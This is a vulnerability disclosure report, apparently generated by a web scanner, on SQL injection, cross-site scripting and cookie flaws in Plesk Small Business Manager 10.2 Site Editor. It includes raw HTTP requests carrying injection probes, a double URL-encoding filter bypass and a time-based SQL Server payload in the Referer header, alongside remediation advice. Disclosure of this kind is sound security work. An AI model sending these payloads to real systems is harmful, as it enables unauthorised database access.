Plesk Small Business Manager 10.2 + Site Editor | Vulnerability Report of October 2010 on Windows 2008 R2 Server, 64 Bit

######################################################################## 
# Vendor: Plesk Small Business Manager 10.2 + Site Editor
# Product Description URL http://www.parallels.com/products/small-business-panel/
# Date: 2010-09-17
# Author : Hoyt LLC – http://cloudscan.me
# Contact : h02332@gmail.com
# Home : http://cloudscan.me
# Bug : Cross Site Scripting + SQL Injection 
# Tested on : Plesk Small Business Manager 10.2.0 // Windows 2008 /64/R2
# Disclosure : Uncoordinated 
# CVE ID's : CVE-2011-4763 -> 4768
########################################################################

Incoming links from Secunia 41765 and another incoming link from OSVDB 68624 and OSVDB 68623 and EDB 15313. NOTE - THIS REPORT MAY CONTAIN FALSE POSITIVES THAT HAVE NOT BEEN PROOFED Target = Plesk Small Business Manager 10.2.0 - Site Editor

Recon and Analysis of Plesk Small Business Manager 10.2.0 - Site Editor

SQL Injection, Cross Site Scripting - Identification and Confirmation

Report generated by Hoyt LLC Research at Tue Oct 12 16:27:23 CDT 2010.

1. SQL injection - CVE-2011-4763

1.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html [currentPageId parameter]

1.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery [filelist cookie]

1.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Image/Edit [PLESKSESSID cookie]

1.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Publish [Referer HTTP header]

1.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css [colorScheme parameter]

1.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif [template parameter]

1.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg [colorScheme parameter]

2. Cross-site scripting (reflected) - CVE-2011-4764

2.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image [file parameter]

2.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image [name of an arbitrarily supplied request parameter]

2.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php [name of an arbitrarily supplied request parameter]

3. Cookie without HttpOnly flag set - CVE-2011-4765

3.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/

3.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Login

3.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/NoCookies

3.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/UnsupportedBrowser

3.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/

3.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design

3.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit

3.8. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/

3.9. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html

3.10. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image

3.11. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery

3.12. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/

3.13. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Add

3.14. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Edit

3.15. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Image/Edit

3.16. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/ImageUpload

3.17. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload

3.18. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Overview

3.19. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Pages

3.20. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Publish

3.21. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Start

3.22. http://vulnerarable.plesk.smb.10.2.0.site:2006/custom/

3.23. http://vulnerarable.plesk.smb.10.2.0.site:2006/external_login.php

3.24. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/bullet.gif

3.25. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/header.jpg

3.26. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/hleft.jpg

3.27. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/htop.jpg

3.28. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/spacer.gif

3.29. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_02.jpg

3.30. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_06.jpg

3.31. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_10.jpg

3.32. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_13.jpg

3.33. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_19.jpg

3.34. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_22.jpg

3.35. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_23.jpg

3.36. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/skins/default/images/toolbar.buttonarrow.gif

3.37. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/skins/default/images/toolbar.start.gif

4. Source code disclosure - CVE-2011-4766

5. Referer-dependent response

6. File upload functionality

6.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design

6.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Add

6.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Edit

7. Email addresses disclosed - CVE-2011-4767

7.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image

7.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/Wizard/SiteFamilies.js

7.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/Wizard/Status.js

7.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/externals/scriptaculous/controls.js

7.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/externals/scriptaculous/dragdrop.js

7.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php

7.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/BlockModule.js

8. Robots.txt file

9. HTML does not specify charset - CVE-2011-4768

9.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image

9.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/blank.html

9.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php

1. SQL injection next
There are 7 instances of this issue:

/Wizard/Edit/Html [currentPageId parameter]
/Wizard/Edit/Modules/ImageGallery [filelist cookie]
/Wizard/Edit/Modules/ImageGallery/Image/Edit [PLESKSESSID cookie]
/Wizard/Publish [Referer HTTP header]
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css [colorScheme parameter]
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif [template parameter]
/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg [colorScheme parameter]

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html [currentPageId parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Html

Issue detail

The currentPageId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currentPageId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the currentPageId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Wizard/Edit/Html?currentPageId=q485ez4jvyq%2527 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd

Response 1 (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:34:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

Request 2

GET /Wizard/Edit/Html?currentPageId=q485ez4jvyq%2527%2527 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:34:37 GMT
Connection: close

1.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery [filelist cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery

Issue detail

The filelist cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the filelist cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the filelist cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Wizard/Edit/Modules/ImageGallery HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9%2527; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 1 (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 22:10:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

Request 2

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 22:10:35 GMT
Connection: close

1.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Image/Edit [PLESKSESSID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery/Image/Edit

Issue detail

The PLESKSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PLESKSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Wizard/Edit/Modules/ImageGallery/Image/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73'; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 1 (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:42:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

Request 2

GET /Wizard/Edit/Modules/ImageGallery/Image/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73''; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:42:06 GMT
Connection: close

1.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Publish [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Publish

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header. The application took 28439 milliseconds to respond to the request, compared with 10057 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Wizard/Publish HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=',0,0)waitfor%20delay'0%3a0%3a20'--
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:35:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

1.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css [colorScheme parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css

Issue detail

Request 1

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css?template=personal-018&colorScheme=green'&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 1 (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:11:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

Request 2

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css?template=personal-018&colorScheme=green''&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 2

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Sun, 10 Oct 2010 06:11:26 GMT
Accept-Ranges: bytes
ETag: "03b69f84168cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:11:29 GMT
Content-Length: 1696

/* content */
.text-header {
   font-weight: bold;
   font-size: 12pt;
   font-family: "Arial Narrow", Arial, sans-serif;
   color: #000000;
}
.pageContent { font-size: 8pt; font-family: Tahoma, sans-serif; color: #7C7C7C; }
.pageContent a { font-size: 8pt; font-family: Tahoma, sans-serif; color: #8D8D8D; }

/* top elements */
.company {
   font-weight: bold;
   font-size: 14pt;
   font-family: "Arial Narrow", Arial, sans-serif;
   color: #FFFFFF;
   font-style: normal;
   text-transform: capitalize;
}
.slogan {
   font-weight: bold;
   font-size: 8pt;
   font-family: "Arial Narrow", Arial, sans-serif;
   color: #FFFFFF;
   font-style: normal;
   text-transform: uppercase;
}

/*main menu*/
.menu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #DFDFDF;
   text-decoration: none;
   font-weight: bold;
}
.amenu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #9CE300;
   font-weight: bold;
}

/*submenu*/
.submenu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #4B4B4B;
   text-decoration: none;
   font-weight: bold;
}
.asubmenu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #4B4B4B;
   text-decoration: underline;
   font-weight: bold;
}

/*bottom menu*/
.bmenu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #4B4B4B;
   text-decoration: none;
   font-weight: bold;
}
